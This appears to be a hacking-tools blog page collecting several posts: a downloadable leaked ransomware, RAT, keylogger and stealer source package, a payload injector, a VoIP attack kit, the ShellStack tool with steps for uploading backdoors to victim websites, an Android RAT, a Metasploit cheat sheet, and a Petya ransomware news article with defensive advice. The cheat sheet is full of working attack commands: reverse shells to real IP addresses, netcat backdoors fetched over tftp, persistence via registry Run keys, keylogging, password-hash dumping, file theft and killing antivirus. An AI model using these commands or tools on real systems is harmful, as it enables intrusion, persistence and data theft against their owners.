Collection Package Ramsonware, Malware, BotNet - Pr1v8 Source Code Leaked

Please note, I am not responsible for your actions.

Ransomware is a type of malicious software from cryptovirology that threatens to publish the victim's data or perpetually block access to it unless a ransom is paid. While some simple ransomware may lock the system in a way which is not difficult for a knowledgeable person to reverse, more advanced malware uses a technique called cryptoviral extortion, in which it encrypts the victim's files, making them inaccessible, and demands a ransom payment to decrypt them. In a properly implemented cryptoviral extortion attack, recovering the files without the decryption key is an intractable problem – and difficult to trace digital currencies such as Ukash and Bitcoin are used for the ransoms, making tracing and prosecuting the perpetrators difficult.

A remote administration tool (RAT) is a piece of software or programming that allows a remote "operator" to control a system as if they have physical access to that system. While desktop sharing and remote administration have many legal uses, "RAT" software is usually associated with criminal or malicious activity. Malicious RAT software is typically installed without the victim's knowledge, often as payload of a Trojan horse, and will try to hide its operation from the victim and from security software

Keystroke logging, often referred to as keylogging or keyboard capturing, is the action of recording (logging) the keys struck on a keyboard, typically covertly, so that the person using the keyboard is unaware that their actions are being monitored. Keylogging can also be used to study human–computer interaction. Numerous keylogging methods exist: they range from hardware and software-based approaches to acoustic analysis.

Stealers the term info stealer is self-explanatory. This type of malware resides in an infected computer and gathers data in order to send it to the attacker. Typical targets are credentials used in online banking services, social media sites, emails, or FTP accounts.



Source: Wikipedia
Password: seginfo

By OffSec 2017

Download Collection Package

Read More

Search for Code Cave in All Binaries (ELF, PE and Mach-o) and Inject Payload - CAVE MINER

This tools search for code cave in binaries (Elf, Mach-o, Pe), and inject code in them.

Features

• Find code caves in ELF, PE and Mach-o
• Use custom bytes for the search (ex: 0xCC can be used as nullbytes on PE)
• See virtual address of the code cave.
• See the permissions of the code caves.
• Search custom cave size
• Inject the payload into the binary

Dependencies

• Python2.7

Installation

pip install cave-miner

Exemple

Download CAVE MINER

Read More

VoIP Penetration Testing and Exploitation Kit - Viproy

Viproy Voip Pen-Test Kit provides penetration testing modules for VoIP networks. It supports signalling analysis for SIP and Skinny protocols, IP phone services and network infrastructure. Viproy 2.0 is released at Blackhat Arsenal USA 2014 with TCP/TLS support for SIP, vendor extentions support, Cisco CDP spoofer/sniffer, Cisco Skinny protocol analysers, VOSS exploits and network analysis modules. Furthermore, Viproy provides SIP and Skinny development libraries for custom fuzzing and analyse modules.

Current Version and Updates
Current version: 4.1 (Requires ruby 2.1.X and Metasploit Framework Github Repo)
Pre-installed repo: https://github.com/fozavci/metasploit-framework-with-viproy

Homepage of Project
http://viproy.com

Talks

Black Hat USA 2016 - VoIP Wars: The Phreakers Awaken
https://www.slideshare.net/fozavci/voip-wars-the-phreakers-awaken
https://www.youtube.com/watch?v=rl_kp5UZKlw

DEF CON 24 - VoIP Wars: The Live Workshop
To be added later

Black Hat Europe 2015 - VoIP Wars: Destroying Jar Jar Lync
http://www.slideshare.net/fozavci/voip-wars-destroying-jar-jar-lync-unfiltered-version
https://youtu.be/TMdiXYzY8qY

DEF CON 23 - The Art of VoIP Hacking Workshop Slide Deck
http://www.slideshare.net/fozavci/the-art-of-voip-hacking-defcon-23-workshop
https://youtu.be/hwDD7K9oXeI

Black Hat USA 2014 / DEF CON 22 - VoIP Wars: Attack of the Cisco Phones
https://www.youtube.com/watch?v=hqL25srtoEY

DEF CON 21 - VoIP Wars: Return of the SIP
https://www.youtube.com/watch?v=d6cGlTB6qKw

Attacking SIP/VoIP Servers Using Viproy
https://www.youtube.com/watch?v=AbXh_L0-Y5A

Current Testing Modules

• SIP Register
• SIP Invite
• SIP Message
• SIP Negotiate
• SIP Options
• SIP Subscribe
• SIP Enumerate
• SIP Brute Force
• SIP Trust Hacking
• SIP UDP Amplification DoS
• SIP Proxy Bounce
• Skinny Register
• Skinny Call
• Skinny Call Forward
• CUCDM Call Forwarder
• CUCDM Speed Dial Manipulator
• MITM Proxy TCP
• MITM Proxy UDP
• Cisco CDP Spoofer
• Boghe VoIP Client INVITE PoC Exploit (New)
• Boghe VoIP Client MSRP PoC Exploit (New)
• SIP Message with INVITE Support (New)
• Sample SIP SDP Fuzzer (New)
• MSRP Message Tester with SIP INVITE Support (New)
• Sample MSRP Message Fuzzer with SIP INVITE Support (New)
• Sample MSRP Message Header Fuzzer with SIP INVITE Support (New)

Documentation

Installation
Copy "lib" and "modules" folders' content to Metasploit root directory.
Mixins.rb File (lib/msf/core/auxiliary/mixins.rb) should contains the following lines
require 'msf/core/auxiliary/sip'
require 'msf/core/auxiliary/skinny'
require 'msf/core/auxiliary/msrp'

Usage of SIP Modules
https://github.com/fozavci/viproy-voipkit/blob/master/SIPUSAGE.md

Usage of Skinny Modules
https://github.com/fozavci/viproy-voipkit/blob/master/SKINNYUSAGE.md

Usage of Auxiliary Viproy Modules
https://github.com/fozavci/viproy-voipkit/blob/master/OTHERSUSAGE.md

Download Viproy

Read More

A PHP Based Tool That Helps You To Manage All Your Backdoored Websites Efficiently - ShellStack

ShellStack is a PHP based backdoor management tool. This Tool comes handy for "HACKERS" who wish to keep a track of every website they hack. The tool generates a backdoor file which you just have to upload to the site and put the backdoor URL in the shells.txt present in the tool's directory.

With ShellStack You can

• Import PHP Shells
• Get Server Details
• Upload Files From Your System using your terminal
• And Above all You Can Manage Your Backdoors Efficiently

How To Use

1. git clone https://github.com/Tuhinshubhra/shellstack
2. cd shellstack
3. php shellstack.php
4. generatebd and exit the tool use CTRL + C - This will generate a backdoor file in the same directory as of the tool in a file named backdoor.php
5. Upload The Backdoor File To The Victim website
6. Copy The Backdoor URL and paste it in the shells.txt file present in the tool's directory and save it (Each backdoor is separated by a new line)
7. php shellstack.php
8. Enter The Serial No Assigned To The Backdoor
9. Rest is pretty Self explanatory

Watch The Video Here: https://youtu.be/umk3ZNZ5Y1I

Requirements

php
curl 

Example

root@R3D_MACH1N3:/home/redhaxor/Desktop/shellstack# php shellstack.php


________________________________________________________________________________
_______ _     _ _______               _______ _______ _______ _______ _     _
|______ |_____| |______ |      |      |______    |    |_____| |       |____/
______| |     | |______ |_____ |_____ ______|    |    |     | |_____  |    \_
________________________________________________________________________________

                    Simple Backdoor Management System
                    Coded By R3D#@x0R_2H1N A.K.A Tuhinshubhra 
                    Shout Out: LulZSec India  
================================================================================



List Of Backdoors:

0. http://localhost/backdoor.php
=============================================

[#] Enter Either Of These (Backdoor No.|help|generatebd) : 0

[+] Shell Selected: http://localhost/backdoor.php
[+] Validating Backdoor: Backdoor Found!

List Of Actions
================
[1] Import PHP Shells
[2] Server Details
[3] Remove Backdoor
[4] Remote File Upload
[5] Exit

[#] Select Option(1|2|3|4|5):2

[+] Server Info
[i] Sending Request And Getting Response...
[i] Server: Linux R3D_MACH1N3 4.9.0-kali4-amd64 #1 SMP Debian 4.9.30-1kali1 (2017-06-06) x86_64
[i] Server IP: 127.0.0.1


Press Enter To Continue


List Of Actions
================
[1] Import PHP Shells
[2] Server Details
[3] Remove Backdoor
[4] Remote File Upload
[5] Exit

[#] Select Option(1|2|3|4|5):1


List Of Shells
===============
[1] Dhanush shell {User & Pass : shellstack123}
[2] B374K shell {Pass : shellstack123}
[3] Kurama shell V.1.0 {Pass : red}
[4] WSO shell {Pass : shellstack123}
[5] MiNi shell {User & Pass : shellstack123}

[#] Select Shell To Import(1-5):1


[i] Importing Shell...
[i] Sending Request And Getting Response...
[R] Dhanush Shell Imported Successfully To /var/www/html/dhanush.php


Press Enter To Continue


List Of Actions
================
[1] Import PHP Shells
[2] Server Details
[3] Remove Backdoor
[4] Remote File Upload
[5] Exit

[#] Select Option(1|2|3|4|5):5
root@R3D_MACH1N3:/home/redhaxor/Desktop/shellstack# 

Release(s)

Version 1.0 On 14-06-2017

Screenshot

Download ShellStack

Read More

Avoid being scanned by spoiling movies on all your ports! - spoilerwall

Spoilerwall introduces a brand new concept in the field of network hardening. Avoid being scanned by spoiling movies on all your ports!
Firewall? How about Fire'em'all! Stop spending thousand of dollars on big teams that you don't need! Just fire up the Spoilers Server and that's it!

Movie Spoilers DB + Open Ports + Pure Evil = Spoilerwall

Set your own:

1. Clone this repo

$ git clone git@github.com:infobyte/spoilerwall.git

2. Edit the file server-spoiler.py and set the HOST and PORT variables.
   
3. Run the server
   

$ python2 server-spoiler.py

The server will listen on the selected port (8080 by default). Redirect incoming TCP traffic in all ports to this service by running:

iptables -A PREROUTING -t nat -i eth0 -p tcp --dport 1:65535 -j DNAT --to-destination {HOST}:{PORT}

Change {HOST} and {PORT} for the values set in step (2). Also, if the traffic is redirected to localhost, run:

sysctl -w net.ipv4.conf.eth0.route_localnet=1

Using this config, an nmap scan will show every port as open and a spoiler for each one.
View the live demo running in spoilerwall.faradaysec.com

~ ❯❯❯ telnet spoilerwall.faradaysec.com 23

Trying 138.197.196.144...

Connected to spoilerwall.faradaysec.com.

Escape character is '^]'.

Gummo

Fucked up people killing cats after a tornado

Connection closed by foreign host.

Browse in Shodan (but beware of the Spoilers!):
https://www.shodan.io/host/138.197.196.144
Be careful in your next CTF - you never know when the spoilers are coming!

Download spoilerwall

Read More

Metasploit Cheatsheet

Metasploit Cheatsheet

Cheat sheet of Metasploit… Commands are as follows..

use exploit/multi/handler

set PAYLOAD windows/meterpreter/reverse_tcp

set LHOST rmccurdy.com

set LPORT 21

set ExitOnSession false

# set AutoRunScript pathto script you want to autorun after exploit is run

set AutoRunScript persistence -r 75.139.158.51 -p 21 -A -X -i 30

exploit -j -z

# file_autopwn

rm -Rf /tmp/1

mkdir /tmp/1

rm -Rf ~/.msf3

wget -O /tmp/file3.pdf https://www1.nga.mil/Newsroom/PressR…s/nga10_02.pdf

./msfconsole

db_driver sqlite3

db_create pentest11

setg LHOST 75.139.158.51

setg LPORT 21

setg SRVPORT 21

setg LPORT_WIN32 21

setg INFILENAME /tmp/file3.pdf

use auxiliary/server/file_autopwn

set OUTPATH /tmp/1

set URIPATH /msf

set SSL true

set ExitOnSession false

set PAYLOAD windows/meterpreter/reverse_tcp

setg PAYLOAD windows/meterpreter/reverse_tcp

set AutoRunScript persistence -r 75.139.158.51 -p 21 -A -X -i 30

run

# shows all the scripts

run

# persistence! broken …if you use DNS name ..

run persistence -r 75.139.158.51 -p 21 -A -X -i 30

run get_pidgin_creds

idletime

sysinfo

# SYSTEM SHELL ( pick a proc that is run by system )

migrate 376

shell

# session hijack tokens

use incognito

impersonate_token “NT AUTHORITY\\SYSTEM”

# escalate to system

use priv

getsystem

execute -f cmd.exe -H -c -i -t

execute -f cmd.exe -i -t

# list top used apps

run prefetchtool -x 20

# list installed apps

run prefetchtool -p

run get_local_subnets

# find and download files

run search_dwld “%USERPROFILE%\\my documents” passwd

run search_dwld “%USERPROFILE%\\desktop passwd

run search_dwld “%USERPROFILE%\\my documents” office

run search_dwld “%USERPROFILE%\\desktop” office

# alternate

download -r “%USERPROFILE%\\desktop” ~/

download -r “%USERPROFILE%\\my documents” ~/

# alternate to shell not SYSTEM

# execute -f cmd.exe -H -c -i -t

# does some run wmic commands etc

run winenum

# rev shell the hard way

run scheduleme -m 1 -u /tmp/nc.exe -o “-e cmd.exe -L -p 8080”

# An example of a run of the file to download via tftp of Netcat and then running it as a backdoor.

run schtasksabuse-dev -t 192.168.1.7 -c “tftp -i 192.168.1.8 GET nc.exe,nc -L -p 8080 -e cmd.exe” -d 4

run schtasksabuse -t 192.168.1.7 -c “tftp -i 192.168.1.8 GET nc.exe,nc -L -p 8080 -e cmd.exe” -d 4

# vnc / port fwd for linux

run vnc

# priv esc

run kitrap0d

run getgui

# somewhat broken .. google sdt cleaner NtTerminateProcess !@?!?!

run killav

run winemun

run memdump

run screen_unlock

upload /tmp/system32.exe C:\\windows\\system32\\

reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion \\run

reg setval -k HKLM\\software\\microsoft\\windows\\currentversion \\run -v system32 -d “C:\\windows\\system32\\system32.exe -Ldp 455 -e cmd.exe”

reg queryval -k HKLM\\software\\microsoft\\windows\\currentversion \\Run -v system32

reg enumkey -k HKLM\\system\\controlset001\services\\sharedaccess \\parameters\\firewallpolicy\\Standardprofile\\aut horizedapplications\\list

reg setval -k HKLM\\system\\controlset001\services\\sharedaccess \\parameters\\firewallpolicy\\Standardprofile\\aut horizedapplications\\list -v sys

reg queryval -k HKLM\\system\\controlset001\services\\sharedaccess \\parameters\\firewallpolicy\\Standardprofile\\aut horizedapplications\\list -v system32

upload /neo/wallpaper1.bmp “C:\\documents and settings\\pentest3\\local settings\\application data\\microsoft\\”

getuid

ps

getpid

keyscan_start

keyscan_dump

migrate 520

portfwd add -L 104.4.4 -l 6666 -r 192.168.1.1 -p 80″

portfwd add -L 192.168.1.1 -l -r 10.5.5.5 -p 6666

shell

run myremotefileserver_mserver -h

run myremotefileserver_mserver -p 8787

run msf_bind

run msf_bind -p 1975

rev2self

getuid

getuid

enumdesktops

grabdesktop

run deploymsf -f framework-3.3-dev.exe

run hashdump

run metsvc

run scraper

run checkvm

run keylogrecorder

run netenum -fl -hl localhostlist.txt -d google.com

run netenum -rl -r 10.192.0.50-10.192.0.254

run netenum -st -d google.com

run netenum -ps -r 10.192.0.50-254

# Windows Login Brute Force Meterpreter Script

run winbf -h

# upload a script or executable and run it

uploadexec

# Using Payload As A Backdoor from a shell

REG add HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Run /v firewall /t REG_SZ /d “c:\windows\system32\metabkdr.exe” /f

at 19:00 /every:M,T,W,Th,F cmd /c start “%USERPROFILE%\metabkdr.exe”

SCHTASKS /Create /RU “SYSTEM” /SC MINUTE /MO 45 /TN FIREWALL /TR “%USERPROFILE%\metabkdr.exe” /ED 11/11/2011

# kill AV this will not unload it from mem it needs reboot or kill from memory still … 

Darkspy, Seem, Icesword GUI can kill the tasks

catchme.exe -K “c:\Program Files\Kaspersky\avp.exe”

catchme.exe -E “c:\Program Files\Kaspersky\avp.exe”

catchme.exe -O “c:\Program Files\Kaspersky\avp.exe” dummy

Offsec 

Read More

CIA Developed Android Malware That Works as an SMS Proxy - Vault 7

Vault 7: CIA Developed Android Malware That Works as an SMS Proxy


Today, July 13th 2017, WikiLeaks publishes documents from the Highrise project of the CIA. HighRise is an Android application designed for mobile devices running Android 4.0 to 4.3. It provides a redirector function for SMS messaging that could be used by a number of IOC tools that use SMS messages for communication between implants and listening posts. HighRise acts as a SMS proxy that provides greater separation between devices in the field ("targets") and the listening post (LP) by proxying "incoming" and "outgoing" SMS messages to an internet LP. Highrise provides a communications channel between the HighRise field operator and the LP with a TLS/SSL secured internet communication.


Source: https://wikileaks.org/vault7/releases/#Highrise

Read More

Android Remote Administration Tool - AhMyth Android RAT

AhMyth Android RAT is an Android Remote Administration Tool

Beta Version
It consists of two parts:

• Server side: desktop application based on electron framework (control panel)
• Client side: Android application (backdoor)

Getting Started

From source code

Prerequisite :

• Electron (to start the app)
• Java (to generate apk backdoor)
• Electron-builder and electron-packer (to build binaries for (OSX,WINDOWS,LINUX))

1. git clone https://github.com/AhMyth/AhMyth-Android-RAT.git
2. cd AhMyth-Android-RAT
3. npm start

From binaries

Prerequisite :

• Download a binary from https://github.com/AhMyth/AhMyth-Android-RAT/releases
• Java (to generate apk backdoor)

Screenshot

Video Tutorial

Download AhMyth Android RAT

Read More

Petya Ransomware Spreading Rapidly Worldwide, Just Like WannaCry - News

Watch out, readers! It is ransomware, another WannaCry, another wide-spread attack.

The WannaCry ransomware is not dead yet and another large scale ransomware attack is making chaos worldwide, shutting down computers at corporates, power supplies, and banks across Russia, Ukraine, Spain, France, UK, India, and Europe and demanding $300 in bitcoins.

According to multiple sources, a new variant of Petya ransomware, also known as Petwrap, is spreading rapidly with the help of same Windows SMBv1 vulnerability that the WannaCry ransomware abused to infect 300,000 systems and servers worldwide in just 72 hours last month.

Apart from this, many victims have also informed that Petya ransomware has also infected their patch systems.

"Petya uses the NSA Eternalblue exploit but also spreads in internal networks with WMIC and PSEXEC. That's why patched systems can get hit." Mikko Hypponen confirms, Chief Research Officer at F-Secure.

Petya is a nasty piece of ransomware and works very differently from any other ransomware malware. Unlike other traditional ransomware, Petya does not encrypt files on a targeted system one by one.

Instead, Petya reboots victims computers and encrypts the hard drive's master file table (MFT) and renders the master boot record (MBR) inoperable, restricting access to the full system by seizing information about file names, sizes, and location on the physical disk.

Petya ransomware replaces the computer's MBR with its own malicious code that displays the ransom note and leaves computers unable to boot.

Don't Pay Ransom, You Wouldn’t Get Your Files Back 

Infected users are advised not to pay the ransom because hackers behind Petya ransomware can’t get your emails anymore.

Posteo, the German email provider, has suspended the email address i.e. wowsmith123456@posteo.net, which was behind used by the criminals to communicate with victims after getting the ransom to send the decryption keys.

At the time of writing, 23 victims have paid in Bitcoin to '1Mz7153HMuxXTuR2R1t78mGSdzaAtNbBWX' address for decrypting their files infected by Petya, which total roughly $6775.

Petya! Petya! Another Worldwide Ransomware Attack

Screenshots of the latest Petya infection, shared on Twitter, shows that the ransomware displays a text, demanding $300 worth of Bitcoins. Here's what the text read:

"If you see this text, then your files are no longer accessible, because they are encrypted. Perhaps you are busy looking for a way to recover your files, but don't waste your time. Nobody can recover your files without our decryption service."

According to a recent VirusTotal scan, currently, only 16 out of 61 anti-virus services are successfully detecting the Petya ransomware malware.

Petya Ransomware Hits Banks, Telecom, Businesses & Power Companies

Supermarket in Kharkiv, East Ukraine

Petya ransomware has already infected — Russian state-owned oil giant Rosneft, Ukrainian state electricity suppliers, "Kyivenergo" and "Ukrenergo," in past few hours.

"We were attacked. Two hours ago, we had to turn off all our computers. We are waiting for permission from Ukraine's Security Service (SBU) to switch them back on," Kyivenergo's press service said.

There are reports from several banks, including National Bank of Ukraine (NBU) and Oschadbank, as well as other companies confirming they have been hit by the Petya ransomware attacks.

Maersk, an international logistics company, has also confirmed on Twitter that the latest Petya ransomware attacks have shut down its IT systems at multiple locations and business units.

"We can confirm that Maersk IT systems are down across multiple sites and business units. We are currently asserting the situation. The safety of our employees, our operations and customers' business is our top priority. We will update when we have more information," the company said.

The ransomware also impacts multiple workstations at Ukrainian branch's mining company Evraz.

The most severe damages reported by Ukrainian businesses also include compromised systems at Ukraine's local metro and Kiev's Boryspil Airport.

Three Ukrainian telecommunication operators, Kyivstar, LifeCell, Ukrtelecom, are also affected in the latest Petya attack.

How Petya Ransomware Spreading So Fast?

Symantec, the cyber security company, has also confirmed that Petya ransomware is exploiting SMBv1 EternalBlue exploit, just like WannaCry, and taking advantage of unpatched Windows machines.

"Petya ransomware successful in spreading because it combines both a client-side attack (CVE-2017-0199) and a network based threat (MS17-010)," security researcher using Twitter handle ‏HackerFantastic tweeted.

EternalBlue is a Windows SMB exploit leaked by the infamous hacking group Shadow Brokers in its April data dump, who claimed to have stolen it from the US intelligence agency NSA, along with other Windows exploits.

Microsoft has since patched the vulnerability for all versions of Windows operating systems, but many users remain vulnerable, and a string of malware variants are exploiting the flaw to deliver ransomware and mine cryptocurrency.

Just three days ago, we reported about the latest WannaCry attack that hit Honda Motor Company and around 55 speed and traffic light cameras in Japan and Australia, respectively.

Well, it is quite surprising that even after knowing about the WannaCry issue for quite a decent amount of time, big corporates and companies have not yet implemented proper security measures to defend against such threat.

How to Protect Yourself from Ransomware Attacks

What to do immediately? Go and apply those goddamn patches against EternalBlue (MS17-010) and disable the unsecured, 30-year-old SMBv1 file-sharing protocol on your Windows systems and servers.

Since Petya Ransomware is also taking advantage of WMIC and PSEXEC tools to infect fully-patched Windows computers, you are also advised to disable WMIC (Windows Management Instrumentation Command-line).

Prevent Infection & Petya Kill-Switch

Researcher finds Petya ransomware encrypt systems after rebooting the computer. So if your system is infected with Petya ransomware and it tries to restart, just do not power it back on.

"If machine reboots and you see this message, power off immediately! This is the encryption process. If you do not power on, files are fine." ‏HackerFantastic tweeted. "Use a LiveCD or external machine to recover files"

PT Security, a UK-based cyber security company and Amit Serper from Cybereason, have discovered a Kill-Switch for Petya ransomware. According to a tweet, company has advised users to create a file i.e. "C:\Windows\perfc" to prevent ransomware infection.

To safeguard against any ransomware infection, you should always be suspicious of unwanted files and documents sent over an email and should never click on links inside them unless verifying the source.

To always have a tight grip on your valuable data, keep a good back-up routine in place that makes their copies to an external storage device that isn't always connected to your PC.

Moreover, make sure that you run a good and effective anti-virus security suite on your system, and keep it up-to-date. Most importantly, always browse the Internet safely.

Source: The Hacker News

OffensiveSec

Read More